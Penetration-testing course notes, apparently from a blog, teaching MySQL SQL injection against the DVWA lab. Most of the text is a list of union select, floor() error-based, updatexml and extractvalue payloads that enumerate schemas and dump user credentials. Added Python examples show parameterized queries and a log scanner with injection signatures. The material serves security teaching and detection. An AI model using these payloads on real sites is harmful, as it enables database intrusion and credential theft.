Network Security Penetration Testing: Lesson 5 Notes

Common knowledge:

In a phpStudy environment, the MySQL database ships by default with phpMyAdmin, a web-based database management tool.
Once you know the database account and password and find an injection point, you can call phpMyAdmin in the browser and browse all the information in that database graphically; many site administrators overlook this.
After installing MySQL you can simply delete the phpMyAdmin tool.

Changing the password when the database password is known.
Changing the password when the database password is not known.
Importing and exporting a database.

Basic operations:

1.select schema_name from information_schema.schemata;//list all databases
2.show databases;//list all databases
3.select database();//show the current database
4.select table_name from information_schema.tables where table_schema='dvwa';//list all tables in the dvwa database
5.select column_name from information_schema.columns where table_schema='dvwa' and table_name='users';//list all columns of the users table in the dvwa database
6.select user,password from dvwa.users;//show the user name and password contents
Note: the content inside '' sometimes needs to be converted to hex, i.e. ASCII hexadecimal; Burp Suite's Decoder can do the conversion.

Using order by and union select:

1.select user_id,user,password from dvwa.users order by 1;//sort by the Nth column; this indirectly reveals how many columns the table has
2.select user_id,user,password from dvwa.users where user_id=1 union select 1,2,3;//a union query merges both result sets into the echoed output
Changing the statement before the union to a logically false condition echoes only the union query result:
3.select user_id,user,password from dvwa.users where user_id=-1 union select 1,2,3;
4.select user_id,user,password from dvwa.users where user_id=1 and 1=2 union select 1,2,3;

limit 0,1//the first value of the first row
limit 1,1//the first value of the second row
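An added example (not from the original notes) that shows, in Python with sqlite3 standing in for MySQL, why the `-1 union select 1,2,3` and `1 and 1=2 union select 1,2,3` inputs above change the shape of a query built by string concatenation, and why the same strings do nothing against a parameterized query. The in-memory table, its rows and the function names are constructed for this example; only the union trick itself comes from the notes.

```python
import sqlite3

def make_db():
    """Constructed in-memory table shaped like dvwa.users; the rows are placeholders."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users(user_id integer, user text, password text)")
    conn.executemany(
        "insert into users values (?,?,?)",
        [(1, "admin", "placeholder-hash-1"), (2, "gordonb", "placeholder-hash-2")],
    )
    return conn

def lookup_vulnerable(conn, user_id):
    """The injectable pattern: the parameter is pasted into the SQL text, so
    input such as  -1 union select 1,2,3  becomes part of the query."""
    sql = "select user_id,user,password from users where user_id=" + str(user_id)
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, user_id):
    """The fix: the driver binds the value separately; the SQL text is fixed and
    a string like  -1 union select 1,2,3  is compared as data, matching nothing."""
    sql = "select user_id,user,password from users where user_id=?"
    return conn.execute(sql, (user_id,)).fetchall()

def lookup_validated(conn, raw):
    """Belt and braces: reject anything that is not an integer before it
    reaches the database at all."""
    try:
        uid = int(raw)
    except (TypeError, ValueError):
        raise ValueError("user_id must be an integer") from None
    return lookup_parameterized(conn, uid)

if __name__ == "__main__":
    conn = make_db()
    payload = "-1 union select 1,2,3"   # union form from the notes; sqlite syntax is the same here
    print("vulnerable   :", lookup_vulnerable(conn, payload))    # [(1, 2, 3)]
    print("parameterized:", lookup_parameterized(conn, payload)) # []
```

The `order by N` column-counting step in the notes exists only because the concatenated form lets the attacker append a second `select`; once the value is bound as a parameter (or rejected by `lookup_validated`), neither the column count nor the union result is reachable from the `id` input.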

When there are few injection points, a union query can be used to concatenate several results into one output:

1.select concat(user,password) from dvwa.users;//concatenate multiple columns with no separator
2.select concat_ws(0x7e,user,password) from dvwa.users;//concatenate multiple columns with a separator
3.select group_concat(user,0x3a,password) from dvwa.users;//concatenate multiple rows into one row, each row ending with a comma
4.select concat_ws(0x7e,@@hostname,@@datadir,@@version_compile_os);//show the host name, database data directory and operating system version
5.select @@version; select version(); //two commands for showing the database version

Functions commonly used in MySQL error-based injection:

floor (to understand it properly, write a separate article)
extractvalue
updatexml

Format of floor() error-based injection statements:

Format 1:
1' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x3a,user(),0x3a,database()))) x from information_schema.schemata group by x)a)-- //enumerate databases
1' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x3a,schema_name) from information_schema.schemata limit 0,1)) x from information_schema.schemata group by x)a)-- //enumerate databases
1' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x3a,table_name) from information_schema.tables where table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x)a)-- //enumerate tables
1' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x3a,column_name) from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)) x from information_schema.schemata group by x)a)-- //enumerate columns
1' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x3a,first_name) from dvwa.users limit 0,1)) x from information_schema.schemata group by x)a)-- //enumerate column contents
Format 2:

and (select 1 from(select count(*),concat((select (select (select concat(0x7e,payload[],0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
1' And (select 1 from (select count(*),concat((select (select concat (user(),0x3a,database()))),floor(rand(0)*2))x from information_schema.columns group by x)a) -- enumerate databases
1' and (select 1 from (select count(*),concat((select (select (select concat(0x7e,schema_name,0x7e))) from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- //enumerate databases
1' and (select 1 from (select count(*),concat((select (select (select concat(0x7e,table_name,0x7e))) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- //enumerate tables
1' and (select 1 from (select count(*),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- //enumerate columns
1' and (select 1 from (select count(*),concat((select (select (select concat(0x7e,first_name,0x7e))) from dvwa.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- //dump contents

Format 3:
id=1' union select count(*),concat(floor(rand(0)*2),database()) x from information_schema.schemata group by x -- ; enumerate databases
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(table_name) from information_schema.tables where table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x; enumerate table names
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x-- ; enumerate columns
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from dvwa.users limit 0,1)) x from information_schema.schemata group by x-- dump contents


updatexml() error-based injection

1' and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1) -- //dump database information
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) -- //dump the tables of the current database
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1) -- //dump the columns of the users table
1' and updatexml(1,concat(0x7e,(select group_concat(first_name,0x3a,last_name) from dvwa.users),0x7e),1) -- //dump database contents

extractvalue() function error-based injection

1' and extractvalue(1,concat(0x7e,user(),0x7e,database())) -- //dump database information
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) -- //dump the tables of the current database
1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e)) -- //dump the columns of the users table
1' and extractvalue(1,concat(0x7e,(select group_concat(first_name,0x3a,last_name) from dvwa.users),0x7e)) -- //dump database contents
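An added detection example, not part of the original notes: a Python scanner for the three error-based techniques above (floor(rand(0)*2) with group by, updatexml, extractvalue) plus the union select and information_schema probing from the earlier sections. It URL-decodes the request target of each web-server access-log line, repeating the decode so double-encoded payloads are normalized too, lower-cases it and matches the signatures. The log lines, the client IP, the request path and the signature names are all constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines; the IP, the DVWA-like path and
# every query string are made up for this example.
LOG_LINES = [
    '10.0.0.5 - - [01/May/2020:10:00:01 +0000] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4321',
    '10.0.0.5 - - [01/May/2020:10:00:07 +0000] "GET /vulnerabilities/sqli/?id=1%27+and+updatexml(1,concat(0x7e,database(),0x7e),1)+--+ HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/May/2020:10:00:12 +0000] "GET /vulnerabilities/sqli/?id=1%27+and+extractvalue(1,concat(0x7e,user())) HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/May/2020:10:00:20 +0000] "GET /vulnerabilities/sqli/?id=1%27%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),database())x%20from%20information_schema.schemata%20group%20by%20x)a)--%20 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/May/2020:10:00:25 +0000] "GET /vulnerabilities/sqli/?id=%2D1+UNION+SELECT+1,2,3 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/May/2020:10:00:31 +0000] "GET /vulnerabilities/sqli/?id=1%2527%2520and%2520UpdateXML(1,1,1) HTTP/1.1" 200 512',
]

# Client IP at the start of the line, request target between the method and "HTTP/".
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/')

# Signatures of the techniques covered in the notes, applied to the normalized target.
SIGNATURES = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(.*?group\s+by", re.S),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\."),
}

def decode_target(target, max_rounds=3):
    """URL-decode repeatedly (double-encoding is a common filter bypass), then
    lower-case and collapse whitespace so every variant reaches one form."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return re.sub(r"\s+", " ", target.lower())

def classify_request(target):
    """Return the sorted list of signature names that match the request target."""
    normalized = decode_target(target)
    return sorted(name for name, pat in SIGNATURES.items() if pat.search(normalized))

def scan_log(lines):
    """Return one record per suspicious line: client IP, decoded target and tags."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue  # not a request line in the expected shape; skip it
        tags = classify_request(m.group("target"))
        if tags:
            hits.append({"ip": m.group("ip"),
                         "target": decode_target(m.group("target")),
                         "tags": tags})
    return hits

if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit["ip"], hit["tags"], hit["target"])
```

The updatexml() and extractvalue() forms only leak data when the application forwards the MySQL error text to the HTTP response, so the matching mitigation is to stop database error messages reaching the client (for a PHP stack, `display_errors` off and a generic error page) and to use parameterized queries; the scanner above covers the detection side, and the repeated decode is what keeps the last, double-encoded log line from slipping past it.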

Original URL: https://www.cnblogs.com/123456ZJJ/p/12771533.html